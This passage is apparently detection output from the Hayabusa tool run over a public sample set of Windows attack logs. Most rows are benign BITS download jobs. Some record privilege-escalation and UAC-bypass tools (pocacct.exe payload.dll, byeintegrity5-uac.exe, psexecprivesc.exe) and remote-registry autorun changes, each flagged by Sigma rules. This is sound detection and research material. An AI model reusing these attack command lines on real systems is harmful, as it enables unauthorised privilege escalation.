https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: 
http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:25.377 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:59.449 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:42.355 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:59.420 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 
+2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 
+09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 
